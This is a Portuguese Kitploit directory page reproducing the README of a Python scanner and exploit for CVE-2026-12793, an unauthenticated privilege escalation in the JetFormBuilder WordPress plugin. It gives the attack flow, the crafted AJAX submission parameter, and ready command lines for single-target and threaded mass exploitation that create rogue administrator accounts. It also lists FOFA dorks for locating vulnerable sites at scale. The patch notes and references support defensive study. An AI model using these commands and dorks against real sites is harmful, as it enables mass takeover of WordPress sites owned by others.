Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-12793 — Scanner PoC em Python e exploit para CVE-2026-12793, uma escalada de privilégios não autenticada no JetFormBuilder <=3.6.2 que cria contas de administrador do WordPress. | Kitploit
Ferramentas/GitHubGitHub/murrez/cve-2026-12793
Escalada de PrivilégiosReconhecimentoScanners de VulnerabilidadesAnálise de VulnerabilidadesExploraçãoScripting e AutomaçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de Penetração
GitHub
há 11h 33mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
murrez/cve-2026-12793

CVE-2026-12793

Scanner PoC em Python e exploit para CVE-2026-12793, uma escalada de privilégios não autenticada no JetFormBuilder <=3.6.2 que cria contas de administrador do WordPress.

Ver Repositório

CVE-2026-12793 — Escalação de Privilégios Não Autenticada no JetFormBuilder

Scanner de prova de conceito e exploit para CVE-2026-12793 no plugin WordPress JetFormBuilder — Dynamic Blocks Form Builder (Crocoblock).

CVECVE-2026-12793
Pluginjetformbuilder
Afetado≤ 3.6.2
Corrigido em3.6.2.1+
CVSS9.8 Crítico
AutenticaçãoNão autenticada
CWECWE-269 — Gerenciamento Impróprio de Privilégios
Pesquisadordaroo (Wordfence)

Vulnerabilidade

O plugin não verifica se _jet_engine_booking_form_id se refere a um custom post type jet-form-builder publicado antes de carregar o conteúdo de bloco do post referenciado como esquema de formulário e executar ações pós-envio.

Um atacante não autenticado pode enviar uma requisição AJAX elaborada para acionar a ação Register User (wp_insert_user) e criar uma nova conta WordPress. Se o formulário alvo estiver mal configurado com um papel elevado (por exemplo, administrator), isso leva ao controle total do site.

Fluxo de ataque

root@kitploit:~
1. Detect JetFormBuilder + version ≤ 3.6.2 (readme.txt)
2. Discover form ID from public pages (data-form-id, /register/, etc.)
3. POST to referer page with ?jet_form_builder_submit=submit&method=ajax
4. Register User action runs → new WP user created

Correção (3.6.2.1)

  • Block_Helper::is_valid_form_post() — apenas CPT jet-form-builder publicado é aceito
  • Form_Handler::set_form_id() rejeita IDs de formulário inválidos
  • Reforço da validação SSR (wp_insert_user / wp_update_user bloqueados como callbacks)

Requisitos

  • Python 3.8+
  • requests
root@kitploit:~
pip install requests urllib3

Uso

Alvo único — verificação

root@kitploit:~
python poc.py -u https://target.example --mode check

Varredura em massa

root@kitploit:~
python poc.py --list domains.txt --mode check --threads 30 --quiet

Formatos de entrada: um domínio/URL por linha, CSV do FOFA (host,domain), ou candidates.jsonl de uma execução anterior.

Exploit (alvo único)

root@kitploit:~
python poc.py -u https://target.example --mode exploit \
  --form-id 1858 \
  --page-url /register/ \
  --fields login=cadastro_nome,email=cadastro_mail,password=cadastro_senha \
  --username myuser \
  --email [email protected] \
  --password 'SecurePass123!' \
  --verify

Exploit em massa a partir de candidatos

root@kitploit:~
python poc.py --list candidates.jsonl --mode exploit --threads 10 --verify

Opções

Arquivos de saída

ArquivoConteúdo
hits.txt

Exemplo de entrada de candidato

root@kitploit:~
{
  "target": "https://target.example",
  "version": "3.3.3",
  "form_id": 1858,
  "page_url": "https://target.example/register/",
  "fields": {
    "login": "user_login",
    "email": "user_email",
    "password": "user_pass"
  }
}

Nomes de campos auto-detectados são heurísticos. Sempre verifique e substitua com --fields antes do exploit.

Detecção / dorks FOFA

root@kitploit:~
body="/wp-content/plugins/jetformbuilder/"
body="jet-form-builder" && body="wp-content"
header="/wp-content/plugins/jetformbuilder/"
title="WordPress" && body="data-form-id"

Verificação de versão:

root@kitploit:~
/wp-content/plugins/jetformbuilder/readme.txt

Procure por Stable tag: ≤ 3.6.2.

Referências

  • NVD — CVE-2026-12793
  • Wordfence Threat Intel
  • Patchstack
  • WordPress.org changeset
  • GitHub fix commit

Aviso Legal

Esta ferramenta é fornecida para testes de segurança autorizados e fins educacionais apenas. Acesso não autorizado a sistemas de computador é ilegal. Os autores não assumem qualquer responsabilidade pelo uso indevido.

Licença

MIT

Baixar ferramenta
FlagDescrição
-u, --urlURL de alvo único
--listArquivo de lista de alvos
--modecheck (padrão) ou exploit
--form-idID do post de formulário JetFormBuilder conhecido
--page-urlPágina que incorpora o formulário (referer), ex.: /register/
--fieldsMapa de campos: login=x,email=y,password=z
--pathsCaminhos extras para rastrear formulários
--username / --email / --passwordCredenciais para exploit (aleatórias se omitidas)
--verifyVerificar conta via wp-login.php após o envio
-j, --threadsThreads de trabalho (padrão: 20)
--timeoutTimeout HTTP em segundos (padrão: 20)
--proxyURL de proxy HTTP(S)
--outputLog JSONL completo (padrão: cve_2026_12793_results.jsonl)
--vuln-listLista de acertos (padrão: hits.txt)
--candidates-listJSONL de candidatos (padrão: candidates.jsonl)
-q, --quietApenas saída de progresso
URLs de alvos vulneráveis / explorados
candidates.jsonlAlvos com sonda Register User acessível (form_id, page_url, fields)
cve_2026_12793_results.jsonlResultados JSON completos por alvo